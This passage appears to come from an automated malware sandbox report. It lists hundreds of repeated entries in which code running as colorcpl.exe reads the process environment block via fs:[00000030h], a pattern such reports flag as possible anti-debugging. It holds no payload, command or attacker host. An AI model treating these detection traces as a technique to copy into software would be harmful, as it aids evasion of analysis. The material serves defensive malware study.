                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C9D96 mov ecx, dword ptr fs:[00000030h]11_2_2C4C9D96
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50CDB1 mov ecx, dword ptr fs:[00000030h]11_2_2C50CDB1
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50CDB1 mov eax, dword ptr fs:[00000030h]11_2_2C50CDB1
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50CDB1 mov eax, dword ptr fs:[00000030h]11_2_2C50CDB1
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DFDA9 mov eax, dword ptr fs:[00000030h]11_2_2C4DFDA9
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55DDB1 mov eax, dword ptr fs:[00000030h]11_2_2C55DDB1
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F8DBF mov eax, dword ptr fs:[00000030h]11_2_2C4F8DBF
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F8DBF mov eax, dword ptr fs:[00000030h]11_2_2C4F8DBF
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C506DA0 mov eax, dword ptr fs:[00000030h]11_2_2C506DA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C598DAE mov eax, dword ptr fs:[00000030h]11_2_2C598DAE
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C598DAE mov eax, dword ptr fs:[00000030h]11_2_2C598DAE
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5A4DAD mov eax, dword ptr fs:[00000030h]11_2_2C5A4DAD
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4EDDB1 mov eax, dword ptr fs:[00000030h]11_2_2C4EDDB1
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4EDDB1 mov eax, dword ptr fs:[00000030h]11_2_2C4EDDB1
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4EDDB1 mov eax, dword ptr fs:[00000030h]11_2_2C4EDDB1
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C509DAF mov eax, dword ptr fs:[00000030h]11_2_2C509DAF
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50BE51 mov eax, dword ptr fs:[00000030h]11_2_2C50BE51
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50BE51 mov eax, dword ptr fs:[00000030h]11_2_2C50BE51
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E5E40 mov eax, dword ptr fs:[00000030h]11_2_2C4E5E40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5A2E4F mov eax, dword ptr fs:[00000030h]11_2_2C5A2E4F
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5A2E4F mov eax, dword ptr fs:[00000030h]11_2_2C5A2E4F
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CEE5A mov eax, dword ptr fs:[00000030h]11_2_2C4CEE5A
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58DE46 mov eax, dword ptr fs:[00000030h]11_2_2C58DE46
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C550E7F mov eax, dword ptr fs:[00000030h]11_2_2C550E7F
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C550E7F mov eax, dword ptr fs:[00000030h]11_2_2C550E7F
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C550E7F mov eax, dword ptr fs:[00000030h]11_2_2C550E7F
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CBE78 mov ecx, dword ptr fs:[00000030h]11_2_2C4CBE78
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D6E71 mov eax, dword ptr fs:[00000030h]11_2_2C4D6E71
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FAE00 mov eax, dword ptr fs:[00000030h]11_2_2C4FAE00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FAE00 mov eax, dword ptr fs:[00000030h]11_2_2C4FAE00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FAE00 mov eax, dword ptr fs:[00000030h]11_2_2C4FAE00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FAE00 mov ecx, dword ptr fs:[00000030h]11_2_2C4FAE00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FAE00 mov eax, dword ptr fs:[00000030h]11_2_2C4FAE00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FAE00 mov eax, dword ptr fs:[00000030h]11_2_2C4FAE00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FAE00 mov eax, dword ptr fs:[00000030h]11_2_2C4FAE00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FAE00 mov eax, dword ptr fs:[00000030h]11_2_2C4FAE00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FAE00 mov eax, dword ptr fs:[00000030h]11_2_2C4FAE00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FAE00 mov eax, dword ptr fs:[00000030h]11_2_2C4FAE00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C8E1D mov eax, dword ptr fs:[00000030h]11_2_2C4C8E1D
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CDE10 mov eax, dword ptr fs:[00000030h]11_2_2C4CDE10
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4EDE2D mov eax, dword ptr fs:[00000030h]11_2_2C4EDE2D
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4EDE2D mov eax, dword ptr fs:[00000030h]11_2_2C4EDE2D
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4EDE2D mov eax, dword ptr fs:[00000030h]11_2_2C4EDE2D
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D1E30 mov eax, dword ptr fs:[00000030h]11_2_2C4D1E30
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D1E30 mov eax, dword ptr fs:[00000030h]11_2_2C4D1E30
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CBEC0 mov eax, dword ptr fs:[00000030h]11_2_2C4CBEC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CBEC0 mov eax, dword ptr fs:[00000030h]11_2_2C4CBEC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DBEC0 mov eax, dword ptr fs:[00000030h]11_2_2C4DBEC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DBEC0 mov eax, dword ptr fs:[00000030h]11_2_2C4DBEC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DBEC0 mov eax, dword ptr fs:[00000030h]11_2_2C4DBEC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DBEC0 mov eax, dword ptr fs:[00000030h]11_2_2C4DBEC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DBEC0 mov eax, dword ptr fs:[00000030h]11_2_2C4DBEC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DBEC0 mov eax, dword ptr fs:[00000030h]11_2_2C4DBEC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DBEC0 mov eax, dword ptr fs:[00000030h]11_2_2C4DBEC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DBEC0 mov eax, dword ptr fs:[00000030h]11_2_2C4DBEC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FFEC0 mov eax, dword ptr fs:[00000030h]11_2_2C4FFEC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55FEC5 mov eax, dword ptr fs:[00000030h]11_2_2C55FEC5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C508EF5 mov eax, dword ptr fs:[00000030h]11_2_2C508EF5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D3EE1 mov eax, dword ptr fs:[00000030h]11_2_2C4D3EE1
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D6EE0 mov eax, dword ptr fs:[00000030h]11_2_2C4D6EE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D6EE0 mov eax, dword ptr fs:[00000030h]11_2_2C4D6EE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D6EE0 mov eax, dword ptr fs:[00000030h]11_2_2C4D6EE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D6EE0 mov eax, dword ptr fs:[00000030h]11_2_2C4D6EE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D3EF4 mov eax, dword ptr fs:[00000030h]11_2_2C4D3EF4
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D3EF4 mov eax, dword ptr fs:[00000030h]11_2_2C4D3EF4
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D3EF4 mov eax, dword ptr fs:[00000030h]11_2_2C4D3EF4
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C503EEB mov ecx, dword ptr fs:[00000030h]11_2_2C503EEB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C503EEB mov eax, dword ptr fs:[00000030h]11_2_2C503EEB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C503EEB mov eax, dword ptr fs:[00000030h]11_2_2C503EEB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59BEE6 mov eax, dword ptr fs:[00000030h]11_2_2C59BEE6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59BEE6 mov eax, dword ptr fs:[00000030h]11_2_2C59BEE6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59BEE6 mov eax, dword ptr fs:[00000030h]11_2_2C59BEE6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59BEE6 mov eax, dword ptr fs:[00000030h]11_2_2C59BEE6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C502E9C mov eax, dword ptr fs:[00000030h]11_2_2C502E9C
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C502E9C mov ecx, dword ptr fs:[00000030h]11_2_2C502E9C
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55DE9B mov eax, dword ptr fs:[00000030h]11_2_2C55DE9B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D7E96 mov eax, dword ptr fs:[00000030h]11_2_2C4D7E96
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CAE90 mov eax, dword ptr fs:[00000030h]11_2_2C4CAE90
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CAE90 mov eax, dword ptr fs:[00000030h]11_2_2C4CAE90
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CAE90 mov eax, dword ptr fs:[00000030h]11_2_2C4CAE90
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C503E8F mov eax, dword ptr fs:[00000030h]11_2_2C503E8F
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C56AEB0 mov eax, dword ptr fs:[00000030h]11_2_2C56AEB0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C56AEB0 mov eax, dword ptr fs:[00000030h]11_2_2C56AEB0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58DEB0 mov eax, dword ptr fs:[00000030h]11_2_2C58DEB0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CDEA5 mov eax, dword ptr fs:[00000030h]11_2_2C4CDEA5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CDEA5 mov ecx, dword ptr fs:[00000030h]11_2_2C4CDEA5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CFEA0 mov eax, dword ptr fs:[00000030h]11_2_2C4CFEA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55CEA0 mov eax, dword ptr fs:[00000030h]11_2_2C55CEA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55CEA0 mov eax, dword ptr fs:[00000030h]11_2_2C55CEA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55CEA0 mov eax, dword ptr fs:[00000030h]11_2_2C55CEA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55DEAA mov eax, dword ptr fs:[00000030h]11_2_2C55DEAA
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50CF50 mov eax, dword ptr fs:[00000030h]11_2_2C50CF50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C507F51 mov eax, dword ptr fs:[00000030h]11_2_2C507F51
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C554F40 mov eax, dword ptr fs:[00000030h]11_2_2C554F40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C554F40 mov eax, dword ptr fs:[00000030h]11_2_2C554F40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C554F40 mov eax, dword ptr fs:[00000030h]11_2_2C554F40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C554F40 mov eax, dword ptr fs:[00000030h]11_2_2C554F40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C54FF42 mov eax, dword ptr fs:[00000030h]11_2_2C54FF42
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CCF50 mov eax, dword ptr fs:[00000030h]11_2_2C4CCF50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CCF50 mov eax, dword ptr fs:[00000030h]11_2_2C4CCF50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CCF50 mov eax, dword ptr fs:[00000030h]11_2_2C4CCF50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CCF50 mov eax, dword ptr fs:[00000030h]11_2_2C4CCF50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CCF50 mov eax, dword ptr fs:[00000030h]11_2_2C4CCF50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CCF50 mov eax, dword ptr fs:[00000030h]11_2_2C4CCF50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D1F50 mov eax, dword ptr fs:[00000030h]11_2_2C4D1F50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FAF69 mov eax, dword ptr fs:[00000030h]11_2_2C4FAF69
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FAF69 mov eax, dword ptr fs:[00000030h]11_2_2C4FAF69
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FBF60 mov eax, dword ptr fs:[00000030h]11_2_2C4FBF60
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5A4F68 mov eax, dword ptr fs:[00000030h]11_2_2C5A4F68
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55DF10 mov eax, dword ptr fs:[00000030h]11_2_2C55DF10
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C551F13 mov eax, dword ptr fs:[00000030h]11_2_2C551F13
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50CF1F mov eax, dword ptr fs:[00000030h]11_2_2C50CF1F
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C586F00 mov eax, dword ptr fs:[00000030h]11_2_2C586F00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D2F12 mov eax, dword ptr fs:[00000030h]11_2_2C4D2F12
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FEF28 mov eax, dword ptr fs:[00000030h]11_2_2C4FEF28
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C577F3E mov eax, dword ptr fs:[00000030h]11_2_2C577F3E
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58DF2F mov eax, dword ptr fs:[00000030h]11_2_2C58DF2F
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C553FD7 mov eax, dword ptr fs:[00000030h]11_2_2C553FD7
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D2FC8 mov eax, dword ptr fs:[00000030h]11_2_2C4D2FC8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D2FC8 mov eax, dword ptr fs:[00000030h]11_2_2C4D2FC8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D2FC8 mov eax, dword ptr fs:[00000030h]11_2_2C4D2FC8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D2FC8 mov eax, dword ptr fs:[00000030h]11_2_2C4D2FC8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D3FC2 mov eax, dword ptr fs:[00000030h]11_2_2C4D3FC2
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CEFD8 mov eax, dword ptr fs:[00000030h]11_2_2C4CEFD8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CEFD8 mov eax, dword ptr fs:[00000030h]11_2_2C4CEFD8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CEFD8 mov eax, dword ptr fs:[00000030h]11_2_2C4CEFD8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58BFC0 mov ecx, dword ptr fs:[00000030h]11_2_2C58BFC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58BFC0 mov eax, dword ptr fs:[00000030h]11_2_2C58BFC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CBFD0 mov eax, dword ptr fs:[00000030h]11_2_2C4CBFD0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C501FCD mov eax, dword ptr fs:[00000030h]11_2_2C501FCD
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C501FCD mov eax, dword ptr fs:[00000030h]11_2_2C501FCD
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C501FCD mov eax, dword ptr fs:[00000030h]11_2_2C501FCD
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C510FF6 mov eax, dword ptr fs:[00000030h]11_2_2C510FF6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C510FF6 mov eax, dword ptr fs:[00000030h]11_2_2C510FF6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C510FF6 mov eax, dword ptr fs:[00000030h]11_2_2C510FF6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C510FF6 mov eax, dword ptr fs:[00000030h]11_2_2C510FF6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4ECFE0 mov eax, dword ptr fs:[00000030h]11_2_2C4ECFE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4ECFE0 mov eax, dword ptr fs:[00000030h]11_2_2C4ECFE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C586FF7 mov eax, dword ptr fs:[00000030h]11_2_2C586FF7
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50BFEC mov eax, dword ptr fs:[00000030h]11_2_2C50BFEC
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50BFEC mov eax, dword ptr fs:[00000030h]11_2_2C50BFEC
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50BFEC mov eax, dword ptr fs:[00000030h]11_2_2C50BFEC
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5A4FE7 mov eax, dword ptr fs:[00000030h]11_2_2C5A4FE7
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C502F98 mov eax, dword ptr fs:[00000030h]11_2_2C502F98
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C502F98 mov eax, dword ptr fs:[00000030h]11_2_2C502F98
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50CF80 mov eax, dword ptr fs:[00000030h]11_2_2C50CF80
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1F92 mov ecx, dword ptr fs:[00000030h]11_2_2C4E1F92
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1F92 mov ecx, dword ptr fs:[00000030h]11_2_2C4E1F92
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1F92 mov eax, dword ptr fs:[00000030h]11_2_2C4E1F92
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1F92 mov ecx, dword ptr fs:[00000030h]11_2_2C4E1F92
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1F92 mov ecx, dword ptr fs:[00000030h]11_2_2C4E1F92
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1F92 mov eax, dword ptr fs:[00000030h]11_2_2C4E1F92
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1F92 mov ecx, dword ptr fs:[00000030h]11_2_2C4E1F92
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1F92 mov ecx, dword ptr fs:[00000030h]11_2_2C4E1F92
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1F92 mov eax, dword ptr fs:[00000030h]11_2_2C4E1F92
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1F92 mov ecx, dword ptr fs:[00000030h]11_2_2C4E1F92
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1F92 mov ecx, dword ptr fs:[00000030h]11_2_2C4E1F92
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1F92 mov eax, dword ptr fs:[00000030h]11_2_2C4E1F92
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CFF90 mov edi, dword ptr fs:[00000030h]11_2_2C4CFF90
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50BFB0 mov eax, dword ptr fs:[00000030h]11_2_2C50BFB0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C511FB8 mov eax, dword ptr fs:[00000030h]11_2_2C511FB8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C500854 mov eax, dword ptr fs:[00000030h]11_2_2C500854
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E2840 mov ecx, dword ptr fs:[00000030h]11_2_2C4E2840
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C511843 mov eax, dword ptr fs:[00000030h]11_2_2C511843
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C511843 mov eax, dword ptr fs:[00000030h]11_2_2C511843
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C511843 mov eax, dword ptr fs:[00000030h]11_2_2C511843
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C511843 mov eax, dword ptr fs:[00000030h]11_2_2C511843
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C511843 mov eax, dword ptr fs:[00000030h]11_2_2C511843
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C511843 mov eax, dword ptr fs:[00000030h]11_2_2C511843
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D4859 mov eax, dword ptr fs:[00000030h]11_2_2C4D4859
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D4859 mov eax, dword ptr fs:[00000030h]11_2_2C4D4859
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C501876 mov eax, dword ptr fs:[00000030h]11_2_2C501876
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C501876 mov eax, dword ptr fs:[00000030h]11_2_2C501876
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C566870 mov eax, dword ptr fs:[00000030h]11_2_2C566870
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C566870 mov eax, dword ptr fs:[00000030h]11_2_2C566870
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CD860 mov eax, dword ptr fs:[00000030h]11_2_2C4CD860
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CD878 mov eax, dword ptr fs:[00000030h]11_2_2C4CD878
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55C810 mov eax, dword ptr fs:[00000030h]11_2_2C55C810
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F9803 mov eax, dword ptr fs:[00000030h]11_2_2C4F9803
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58F80A mov eax, dword ptr fs:[00000030h]11_2_2C58F80A
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50A830 mov eax, dword ptr fs:[00000030h]11_2_2C50A830
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C503820 mov eax, dword ptr fs:[00000030h]11_2_2C503820
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55D820 mov ecx, dword ptr fs:[00000030h]11_2_2C55D820
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55D820 mov eax, dword ptr fs:[00000030h]11_2_2C55D820
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55D820 mov eax, dword ptr fs:[00000030h]11_2_2C55D820
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F2835 mov eax, dword ptr fs:[00000030h]11_2_2C4F2835
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F2835 mov eax, dword ptr fs:[00000030h]11_2_2C4F2835
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F2835 mov eax, dword ptr fs:[00000030h]11_2_2C4F2835
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F2835 mov ecx, dword ptr fs:[00000030h]11_2_2C4F2835
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F2835 mov eax, dword ptr fs:[00000030h]11_2_2C4F2835
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F2835 mov eax, dword ptr fs:[00000030h]11_2_2C4F2835
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50182A mov eax, dword ptr fs:[00000030h]11_2_2C50182A
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D38C4 mov eax, dword ptr fs:[00000030h]11_2_2C4D38C4
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D38C4 mov eax, dword ptr fs:[00000030h]11_2_2C4D38C4
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D38C4 mov eax, dword ptr fs:[00000030h]11_2_2C4D38C4
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D38C4 mov eax, dword ptr fs:[00000030h]11_2_2C4D38C4
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D38C4 mov eax, dword ptr fs:[00000030h]11_2_2C4D38C4
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D38C4 mov eax, dword ptr fs:[00000030h]11_2_2C4D38C4
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D38C4 mov eax, dword ptr fs:[00000030h]11_2_2C4D38C4
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FE8C0 mov eax, dword ptr fs:[00000030h]11_2_2C4FE8C0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D78D9 mov eax, dword ptr fs:[00000030h]11_2_2C4D78D9
